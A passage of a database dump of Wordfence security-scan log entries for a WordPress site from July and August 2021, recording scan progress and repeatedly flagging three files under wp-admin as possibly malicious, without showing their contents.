far'),(1244,1626907366.250824,2,'info','Analyzed 2500 files containing 51.45 MB of data so far'),(1245,1626907367.640463,2,'info','Analyzed 2600 files containing 52.85 MB of data so far'),(1246,1626907369.878295,2,'info','Analyzed 2700 files containing 55.15 MB of data so far'),(1247,1626907371.275845,2,'info','Analyzed 2800 files containing 59.33 MB of data so far'),(1248,1626907373.024516,2,'info','Analyzed 2900 files containing 60.73 MB of data so far'),(1249,1626907376.017910,2,'info','Analyzed 3000 files containing 62.4 MB of data so far'),(1250,1626907376.187829,2,'info','Analyzed 3015 files containing 62.71 MB of data.'),(1258,1626907377.730456,2,'info','Starting scan of file contents'),(1259,1626907378.777708,2,'info','Scanned contents of 28 additional files at 27.63 per second'),(1260,1626907379.805831,2,'info','Scanned contents of 75 additional files at 36.74 per second'),(1261,1626907379.957436,2,'info','Scanned contents of 86 additional files at 39.22 per second'),(1262,1626907379.981994,2,'info','Asking Wordfence to check URLs against malware list.'),(1263,1626907380.018404,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(1264,1626907380.670448,2,'info','Done host key check.'),(1265,1626907381.977359,2,'info','Done file contents scan'),(1266,1626907381.987969,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(1267,1626907381.992092,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(1268,1626907381.996644,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(1274,1626907385.228749,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(1275,1626907385.233792,2,'info','Checking 1507 host keys against Wordfence scanning servers.'),(1276,1626907386.019951,2,'info','Done host key check.'),(1277,1626907386.056661,2,'info','Done examining URLs'),(1282,1626907386.632329,2,'info','Starting password strength check on 1 user.'),(1289,1626907389.398678,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(1290,1626907389.404279,2,'info','Done examining URLs'),(1292,1626907389.634359,1,'info','-------------------'),(1293,1626907389.652287,2,'info','Wordfence used 14.29 MB of memory for scan. Server peak memory usage was: 38.29 MB'),(1294,1626907389.664593,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 250 posts, 0 comments and 1766 URLs in 1 minute 28 seconds.'),(1297,1627385116.874556,1,'info','Initiating quick scan'),(1302,1627385117.059924,1,'info','-------------------'),(1303,1627385117.080632,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(1304,1627385117.090802,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1306,1627425075.100301,1,'info','Scheduled Wordfence scan starting at Tuesday 27th of July 2021 10:31:15 PM'),(1308,1627425075.979525,1,'info','Contacting Wordfence to initiate scan'),(1315,1627425085.657079,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.31 TB'),(1316,1627425085.667190,2,'info','The disk has 3466522.48 MB available'),(1324,1627425086.112873,2,'info','Getting plugin list from WordPress'),(1325,1627425086.153845,2,'info','Found 4 plugins'),(1326,1627425086.174668,2,'info','Getting theme list from WordPress'),(1327,1627425086.298399,2,'info','Found 1 theme'),(1339,1627425088.765813,2,'info','500 files indexed'),(1340,1627425088.879293,2,'info','1000 files indexed'),(1341,1627425089.076640,2,'info','1500 files indexed'),(1342,1627425089.231033,2,'info','2000 files indexed'),(1343,1627425089.327707,2,'info','2500 files indexed'),(1344,1627425089.461285,2,'info','3000 files indexed'),(1345,1627425089.507475,2,'info','3015 files indexed'),(1346,1627425095.459986,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(1347,1627425101.116371,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(1348,1627425105.930018,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(1349,1627425113.296084,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(1350,1627425118.682973,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(1351,1627425125.275233,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(1352,1627425131.966975,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(1353,1627425137.611193,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(1354,1627425144.431854,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(1355,1627425155.737465,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(1356,1627425161.839605,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(1357,1627425168.492670,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(1358,1627425172.647430,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(1359,1627425180.116344,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(1360,1627425185.925318,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(1361,1627425190.263804,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(1362,1627425196.982932,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(1363,1627425202.495238,2,'info','Analyzed 1800 files containing 29.26 MB of data so far'),(1364,1627425208.868472,2,'info','Analyzed 1900 files containing 30.05 MB of data so far'),(1365,1627425214.457693,2,'info','Analyzed 2000 files containing 30.86 MB of data so far'),(1366,1627425218.707156,2,'info','Analyzed 2100 files containing 32.87 MB of data so far'),(1367,1627425224.247752,2,'info','Analyzed 2200 files containing 35.35 MB of data so far'),(1368,1627425228.679945,2,'info','Analyzed 2300 files containing 36.51 MB of data so far'),(1369,1627425233.344252,2,'info','Analyzed 2400 files containing 46.03 MB of data so far'),(1370,1627425238.649257,2,'info','Analyzed 2500 files containing 51.46 MB of data so far'),(1371,1627425244.292527,2,'info','Analyzed 2600 files containing 52.86 MB of data so far'),(1372,1627425249.265013,2,'info','Analyzed 2700 files containing 55.16 MB of data so far'),(1373,1627425254.177876,2,'info','Analyzed 2800 files containing 59.34 MB of data so far'),(1374,1627425259.929725,2,'info','Analyzed 2900 files containing 60.74 MB of data so far'),(1375,1627425264.524440,2,'info','Analyzed 3000 files containing 62.41 MB of data so far'),(1376,1627425265.104355,2,'info','Analyzed 3015 files containing 62.72 MB of data.'),(1384,1627425266.965995,2,'info','Starting scan of file contents'),(1385,1627425268.038397,2,'info','Scanned contents of 21 additional files at 19.99 per second'),(1386,1627425269.117375,2,'info','Scanned contents of 43 additional files at 20.19 per second'),(1387,1627425270.142137,2,'info','Scanned contents of 62 additional files at 19.66 per second'),(1388,1627425271.180064,2,'info','Scanned contents of 81 additional files at 19.32 per second'),(1389,1627425271.425045,2,'info','Scanned contents of 86 additional files at 19.38 per second'),(1390,1627425271.439430,2,'info','Asking Wordfence to check URLs against malware list.'),(1391,1627425271.462177,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(1392,1627425272.103437,2,'info','Done host key check.'),(1393,1627425273.522686,2,'info','Done file contents scan'),(1394,1627425273.538619,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(1395,1627425273.595193,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(1396,1627425273.630607,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(1402,1627425283.235560,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(1403,1627425283.596175,2,'info','Checking 1507 host keys against Wordfence scanning servers.'),(1404,1627425284.414393,2,'info','Done host key check.'),(1405,1627425284.428682,2,'info','Done examining URLs'),(1410,1627425285.112458,2,'info','Starting password strength check on 1 user.'),(1417,1627425288.145709,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(1418,1627425288.148721,2,'info','Done examining URLs'),(1420,1627425288.325513,1,'info','-------------------'),(1421,1627425288.349914,2,'info','Wordfence used 14.3 MB of memory for scan. Server peak memory usage was: 40.3 MB'),(1422,1627425288.369598,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 250 posts, 0 comments and 1766 URLs in 3 minutes 31 seconds.'),(1425,1627471538.472396,1,'info','Initiating quick scan'),(1430,1627471539.649606,1,'info','-------------------'),(1431,1627471539.929872,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(1432,1627471539.953295,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1435,1627558056.564380,1,'info','Initiating quick scan'),(1440,1627558056.842196,1,'info','-------------------'),(1441,1627558056.886465,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(1442,1627558056.896858,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1445,1627644386.750083,1,'info','Initiating quick scan'),(1450,1627644386.972704,1,'info','-------------------'),(1451,1627644386.994350,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(1452,1627644387.004748,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1454,1627684258.886083,1,'info','Scheduled Wordfence scan starting at Friday 30th of July 2021 10:30:58 PM'),(1456,1627684259.397820,1,'info','Contacting Wordfence to initiate scan'),(1463,1627684266.568048,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(1464,1627684266.569899,2,'info','The disk has 3465137.46 MB available'),(1472,1627684266.632466,2,'info','Getting plugin list from WordPress'),(1473,1627684266.639561,2,'info','Found 4 plugins'),(1474,1627684266.641602,2,'info','Getting theme list from WordPress'),(1475,1627684266.661541,2,'info','Found 1 theme'),(1487,1627684268.700716,2,'info','500 files indexed'),(1488,1627684268.777447,2,'info','1000 files indexed'),(1489,1627684268.877559,2,'info','1500 files indexed'),(1490,1627684268.968551,2,'info','2000 files indexed'),(1491,1627684268.985234,2,'info','2500 files indexed'),(1492,1627684269.020241,2,'info','3000 files indexed'),(1493,1627684269.025496,2,'info','3015 files indexed'),(1494,1627684270.624442,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(1495,1627684271.850634,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(1496,1627684273.483976,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(1497,1627684276.934994,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(1498,1627684278.127836,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(1499,1627684279.110646,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(1500,1627684281.718118,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(1501,1627684283.091086,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(1502,1627684284.436913,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(1503,1627684285.449327,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(1504,1627684286.589949,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(1505,1627684289.879198,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(1506,1627684293.824423,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(1507,1627684295.606072,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(1508,1627684297.189365,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(1509,1627684298.376000,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(1510,1627684300.868989,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(1511,1627684302.051429,2,'info','Analyzed 1800 files containing 29.26 MB of data so far'),(1512,1627684302.991601,2,'info','Analyzed 1900 files containing 30.05 MB of data so far'),(1513,1627684304.971718,2,'info','Analyzed 2000 files containing 30.86 MB of data so far'),(1514,1627684307.512660,2,'info','Analyzed 2100 files containing 32.87 MB of data so far'),(1515,1627684309.570965,2,'info','Analyzed 2200 files containing 35.35 MB of data so far'),(1516,1627684310.650440,2,'info','Analyzed 2300 files containing 36.51 MB of data so far'),(1517,1627684312.056354,2,'info','Analyzed 2400 files containing 46.03 MB of data so far'),(1518,1627684313.652926,2,'info','Analyzed 2500 files containing 51.46 MB of data so far'),(1519,1627684314.634710,2,'info','Analyzed 2600 files containing 52.86 MB of data so far'),(1520,1627684315.996967,2,'info','Analyzed 2700 files containing 55.16 MB of data so far'),(1521,1627684317.424667,2,'info','Analyzed 2800 files containing 59.34 MB of data so far'),(1522,1627684319.492510,2,'info','Analyzed 2900 files containing 60.74 MB of data so far'),(1523,1627684323.760878,2,'info','Analyzed 3000 files containing 62.41 MB of data so far'),(1524,1627684324.787936,2,'info','Analyzed 3015 files containing 62.72 MB of data.'),(1532,1627684326.564474,2,'info','Starting scan of file contents'),(1533,1627684327.606258,2,'info','Scanned contents of 33 additional files at 32.48 per second'),(1534,1627684328.636251,2,'info','Scanned contents of 71 additional files at 34.70 per second'),(1535,1627684329.260083,2,'info','Scanned contents of 86 additional files at 32.21 per second'),(1536,1627684329.271561,2,'info','Asking Wordfence to check URLs against malware list.'),(1537,1627684329.302254,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(1538,1627684329.974884,2,'info','Done host key check.'),(1539,1627684330.666958,2,'info','Done file contents scan'),(1540,1627684330.669374,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(1541,1627684330.689995,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(1542,1627684330.710791,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(1548,1627684333.197233,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(1549,1627684333.201194,2,'info','Checking 1507 host keys against Wordfence scanning servers.'),(1550,1627684333.946396,2,'info','Done host key check.'),(1551,1627684333.961899,2,'info','Done examining URLs'),(1556,1627684334.180976,2,'info','Starting password strength check on 1 user.'),(1563,1627684337.016512,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(1564,1627684337.031990,2,'info','Done examining URLs'),(1566,1627684337.310272,1,'info','-------------------'),(1567,1627684337.316357,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 36 MB'),(1568,1627684337.327355,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 250 posts, 0 comments and 1766 URLs in 1 minute 17 seconds.'),(1571,1627731086.486856,1,'info','Initiating quick scan'),(1576,1627731086.680924,1,'info','-------------------'),(1577,1627731086.703083,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(1578,1627731086.713998,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1581,1627817322.478460,1,'info','Initiating quick scan'),(1586,1627817323.870646,1,'info','-------------------'),(1587,1627817324.201770,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 14 MB'),(1588,1627817324.230119,1,'info','Quick Scan Complete. Scanned in 2 seconds.'),(1591,1627903769.855692,1,'info','Initiating quick scan'),(1596,1627903774.266025,1,'info','-------------------'),(1597,1627903774.424081,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(1598,1627903774.525379,1,'info','Quick Scan Complete. Scanned in 5 seconds.'),(1600,1627943585.112568,1,'info','Scheduled Wordfence scan starting at Monday 2nd of August 2021 10:33:05 PM'),(1602,1627943585.771874,1,'info','Contacting Wordfence to initiate scan'),(1609,1627943593.372986,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(1610,1627943593.384834,2,'info','The disk has 3463508.48 MB available'),(1618,1627943593.533124,2,'info','Getting plugin list from WordPress'),(1619,1627943593.542415,2,'info','Found 4 plugins'),(1620,1627943593.544206,2,'info','Getting theme list from WordPress'),(1621,1627943593.555574,2,'info','Found 1 theme'),(1633,1627943595.448693,2,'info','500 files indexed'),(1634,1627943595.500095,2,'info','1000 files indexed'),(1635,1627943595.551416,2,'info','1500 files indexed'),(1636,1627943595.636493,2,'info','2000 files indexed'),(1637,1627943595.738240,2,'info','2500 files indexed'),(1638,1627943595.819831,2,'info','3000 files indexed'),(1639,1627943595.862822,2,'info','3015 files indexed'),(1640,1627943597.507858,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(1641,1627943600.123675,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(1642,1627943601.580758,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(1643,1627943602.958964,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(1644,1627943605.071535,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(1645,1627943607.931551,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(1646,1627943610.207796,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(1647,1627943612.037845,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(1648,1627943613.685086,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(1649,1627943615.526243,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(1650,1627943617.192427,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(1651,1627943618.709658,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(1652,1627943620.773127,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(1653,1627943622.545100,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(1654,1627943624.678922,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(1655,1627943626.783698,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(1656,1627943629.789366,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(1657,1627943631.422240,2,'info','Analyzed 1800 files containing 29.27 MB of data so far'),(1658,1627943633.827441,2,'info','Analyzed 1900 files containing 30.06 MB of data so far'),(1659,1627943636.036855,2,'info','Analyzed 2000 files containing 30.86 MB of data so far'),(1660,1627943638.610839,2,'info','Analyzed 2100 files containing 32.87 MB of data so far'),(1661,1627943639.729176,2,'info','Analyzed 2200 files containing 35.36 MB of data so far'),(1662,1627943641.269357,2,'info','Analyzed 2300 files containing 36.52 MB of data so far'),(1663,1627943643.696317,2,'info','Analyzed 2400 files containing 46.03 MB of data so far'),(1664,1627943647.575040,2,'info','Analyzed 2500 files containing 51.47 MB of data so far'),(1665,1627943649.007969,2,'info','Analyzed 2600 files containing 52.86 MB of data so far'),(1666,1627943651.838658,2,'info','Analyzed 2700 files containing 55.16 MB of data so far'),(1667,1627943653.969121,2,'info','Analyzed 2800 files containing 59.35 MB of data so far'),(1668,1627943656.303386,2,'info','Analyzed 2900 files containing 60.74 MB of data so far'),(1669,1627943657.565210,2,'info','Analyzed 3000 files containing 62.42 MB of data so far'),(1670,1627943658.843744,2,'info','Analyzed 3015 files containing 62.72 MB of data.'),(1678,1627943660.627554,2,'info','Starting scan of file contents'),(1679,1627943661.648354,2,'info','Scanned contents of 31 additional files at 30.84 per second'),(1680,1627943662.714055,2,'info','Scanned contents of 76 additional files at 36.70 per second'),(1681,1627943662.970161,2,'info','Scanned contents of 86 additional files at 36.96 per second'),(1682,1627943662.973573,2,'info','Asking Wordfence to check URLs against malware list.'),(1683,1627943662.975948,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(1684,1627943663.581883,2,'info','Done host key check.'),(1685,1627943664.597671,2,'info','Done file contents scan'),(1686,1627943664.638795,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(1687,1627943664.661935,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(1688,1627943664.682685,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(1694,1627943668.618432,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(1695,1627943668.633996,2,'info','Checking 1507 host keys against Wordfence scanning servers.'),(1696,1627943669.418254,2,'info','Done host key check.'),(1697,1627943669.433605,2,'info','Done examining URLs'),(1702,1627943669.831936,2,'info','Starting password strength check on 1 user.'),(1709,1627943672.592867,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(1710,1627943672.628813,2,'info','Done examining URLs'),(1712,1627943672.776856,1,'info','-------------------'),(1713,1627943672.778850,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 36 MB'),(1714,1627943672.780641,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 250 posts, 0 comments and 1766 URLs in 1 minute 25 seconds.'),(1717,1627990231.462754,1,'info','Initiating quick scan'),(1722,1627990232.604369,1,'info','-------------------'),(1723,1627990232.712031,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 26 MB'),(1724,1627990232.811374,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1727,1628076380.111569,1,'info','Initiating quick scan'),(1732,1628076380.320565,1,'info','-------------------'),(1733,1628076380.324640,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(1734,1628076380.326487,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1737,1628162837.361146,1,'info','Initiating quick scan'),(1742,1628162837.593489,1,'info','-------------------'),(1743,1628162837.614559,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 24 MB'),(1744,1628162837.624952,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1746,1628202797.542709,1,'info','Scheduled Wordfence scan starting at Thursday 5th of August 2021 10:33:17 PM'),(1748,1628202798.148857,1,'info','Contacting Wordfence to initiate scan'),(1755,1628202807.614791,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(1756,1628202807.635019,2,'info','The disk has 3464307.41 MB available'),(1764,1628202807.950632,2,'info','Getting plugin list from WordPress'),(1765,1628202807.990579,2,'info','Found 4 plugins'),(1766,1628202808.002042,2,'info','Getting theme list from WordPress'),(1767,1628202808.060627,2,'info','Found 1 theme'),(1779,1628202810.169591,2,'info','500 files indexed'),(1780,1628202810.242965,2,'info','1000 files indexed'),(1781,1628202810.326404,2,'info','1500 files indexed'),(1782,1628202810.383958,2,'info','2000 files indexed'),(1783,1628202810.466169,2,'info','2500 files indexed'),(1784,1628202810.488486,2,'info','3000 files indexed'),(1785,1628202810.494444,2,'info','3015 files indexed'),(1786,1628202811.979390,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(1787,1628202813.233773,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(1788,1628202814.972752,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(1789,1628202818.763417,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(1790,1628202820.863408,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(1791,1628202823.358453,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(1792,1628202825.002713,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(1793,1628202826.241765,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(1794,1628202828.773617,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(1795,1628202830.359578,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(1796,1628202832.861432,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(1797,1628202833.871318,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(1798,1628202835.571574,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(1799,1628202838.307502,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(1800,1628202839.411371,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(1801,1628202840.992557,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(1802,1628202842.722573,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(1803,1628202844.146463,2,'info','Analyzed 1800 files containing 29.27 MB of data so far'),(1804,1628202845.898873,2,'info','Analyzed 1900 files containing 30.06 MB of data so far'),(1805,1628202849.721388,2,'info','Analyzed 2000 files containing 30.86 MB of data so far'),(1806,1628202851.325292,2,'info','Analyzed 2100 files containing 32.87 MB of data so far'),(1807,1628202853.512188,2,'info','Analyzed 2200 files containing 35.36 MB of data so far'),(1808,1628202854.541202,2,'info','Analyzed 2300 files containing 36.52 MB of data so far'),(1809,1628202855.866804,2,'info','Analyzed 2400 files containing 46.03 MB of data so far'),(1810,1628202857.172263,2,'info','Analyzed 2500 files containing 51.47 MB of data so far'),(1811,1628202859.182354,2,'info','Analyzed 2600 files containing 52.86 MB of data so far'),(1812,1628202861.091781,2,'info','Analyzed 2700 files containing 55.16 MB of data so far'),(1813,1628202862.138066,2,'info','Analyzed 2800 files containing 59.35 MB of data so far'),(1814,1628202864.108150,2,'info','Analyzed 2900 files containing 60.74 MB of data so far'),(1815,1628202865.129409,2,'info','Analyzed 3000 files containing 62.42 MB of data so far'),(1816,1628202865.297495,2,'info','Analyzed 3015 files containing 62.72 MB of data.'),(1824,1628202867.343680,2,'info','Starting scan of file contents'),(1825,1628202868.383383,2,'info','Scanned contents of 39 additional files at 38.18 per second'),(1826,1628202869.300851,2,'info','Scanned contents of 86 additional files at 44.36 per second'),(1827,1628202869.302983,2,'info','Asking Wordfence to check URLs against malware list.'),(1828,1628202869.305481,2,'info','Checking 198 host keys against Wordfence scanning servers.'),(1829,1628202869.916560,2,'info','Done host key check.'),(1830,1628202870.619500,2,'info','Done file contents scan'),(1831,1628202870.630273,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/css/index.php'),(1832,1628202870.651160,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/maint/hnsqbue.php'),(1833,1628202870.681081,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/includes/fm.php'),(1839,1628202874.408644,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(1840,1628202874.421024,2,'info','Checking 1507 host keys against Wordfence scanning servers.'),(1841,1628202875.184885,2,'info','Done host key check.'),(1842,1628202875.197020,2,'info','Done examining URLs'),(1847,1628202875.428969,2,'info','Starting password strength check on 1 user.'),(1854,1628202878.057570,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(1855,1628202878.059754,2,'info','Done examining URLs'),(1857,1628202878.115047,1,'info','-------------------'),(1858,1628202878.119461,2,'info','Wordfence used 10 MB of memory for scan. Server peak memory usage was: 34 MB'),(1859,1628202878.122421,1,'info','Scan Complete. Scanned 3015 files, 5 plugins, 1 themes, 250 posts, 0 comments and 1766 URLs in 1 minute 19 seconds.'),(1862,1628249136.199808,1,'info','Initiating quick scan'),(1867,1628249136.481529,1,'info','-------------------'),(1868,1628249136.513439,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(1869,1628249136.534052,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1872,1628335514.734158,1,'info','Initiating quick scan'),(1877,1628335515.191819,1,'info','-------------------'),(1878,1628335515.239675,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 24 MB'),(1879,1628335515.262559,1,'info','Quick Scan Complete. Scanned in 1 second.'),(1882,1628422031.087912,1,'info','Initiating quick scan'),(1887,1628422031.306011,1,'info','-------------------'),(1888,1628422031.327807,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 16 MB'),(1889,1628422031.336149,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(1891,1628461975.077224,1,'info','Scheduled Wordfence scan starting at Sunday 8th of August 2021 10:32:55 PM'),(1893,1628461975.671975,1,'info','Contacting Wordfence to initiate scan'),(1900,1628461982.947374,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(1901,1628461982.949177,2,'info','The disk has 3464690.9 MB available'),(1909,1628461983.043213,2,'info','Getting plugin list from WordPress'),(1910,1628461983.058667,2,'info','Found 4 plugins'),(1911,1628461983.068802,2,'info','Getting theme list from WordPress'),(1912,1628461983.139197,2,'info','Found 1 theme'),(1924,1628461985.580924,2,'info','500 files indexed'),(1925,1628461985.624783,2,'info','1000 files indexed'),(1926,1628461985.705878,2,'info','1500 files indexed'),(1927,1628461985.818435,2,'info','2000 files indexed'),(1928,1628461985.905010,2,'info','2500 files indexed'),(1929,1628461985.949415,2,'info','3000 files indexed'),(1930,1628461985.955526,2,'info','3015 files indexed'),(1931,1628461988.075897,2,'info','Analyzed 100 files containing 1.67 MB of data so far'),(1932,1628461993.681984,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(1933,1628461994.926215,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(1934,1628461996.002973,2,'info','Analyzed 400 files containing 7.28 MB of data so far'),(1935,1628461997.490413,2,'info','Analyzed 500 files containing 8.16 MB of data so far'),(1936,1628461999.255790,2,'info','Analyzed 600 files containing 9.35 MB of data so far'),(1937,1628462000.863564,2,'info','Analyzed 700 files containing 10.07 MB of data so far'),(1938,1628462003.145081,2,'info','Analyzed 800 files containing 11.2 MB of data so far'),(1939,1628462005.311131,2,'info','Analyzed 900 files containing 12.9 MB of data so far'),(1940,1628462008.807300,2,'info','Analyzed 1000 files containing 17.92 MB of data so far'),(1941,1628462011.667765,2,'info','Analyzed 1100 files containing 20.33 MB of data so far'),(1942,1628462012.755615,2,'info','Analyzed 1200 files containing 21.08 MB of data so far'),(1943,1628462015.025006,2,'info','Analyzed 1300 files containing 22.41 MB of data so far'),(1944,1628462016.511594,2,'info','Analyzed 1400 files containing 23.28 MB of data so far'),(1945,1628462017.980400,2,'info','Analyzed 1500 files containing 23.51 MB of data so far'),(1946,1628462019.726082,2,'info','Analyzed 1600 files containing 23.54 MB of data so far'),(1947,1628462020.888922,2,'info','Analyzed 1700 files containing 24.37 MB of data so far'),(1948,1628462022.474007,2,'info','Analyzed 1800 files containing 29.27 MB of data so far'),(1949,1628462023.593787,2,'info','Analyzed 1900 files containing 30.06 MB of data so far'),(1950,1628462027.389428,2,'info','Analyzed 2000 files containing 30.86 MB of data so far'),(1951,1628462028.392807,2,'info','Analyzed 2100 files containing 32.87 MB of data so far'),(1952,1628462029.527247,2,'info','Analyzed 2200 files containing 35.36 MB of data so far'),(1953,1628462031.005000,2,'info','Analyzed 2300 files containing 36.52 MB of data so far'),(1954,1628462035.292171,2,'info','Analyzed 2400 files containing 46.03 MB of data so far'),(1955,1628462036.770252,2,'info','Analyzed 2500 files containing 51.47 MB of data so far'),(1956,1628462038.103879,2,'info','Analyzed 2600 files containing 52.86 MB of data so far'),(1957,1628462039.226819,2,'info','Analyzed 2700 files containing 55.16 MB of data so far'),(1958,1628462041.044286,2,'info','Analyzed 2800 files containing 59.35 MB of data so far'),(1959,1628462043.589805,2,'info','Analyzed 2900 files containing 60.74 MB of data so 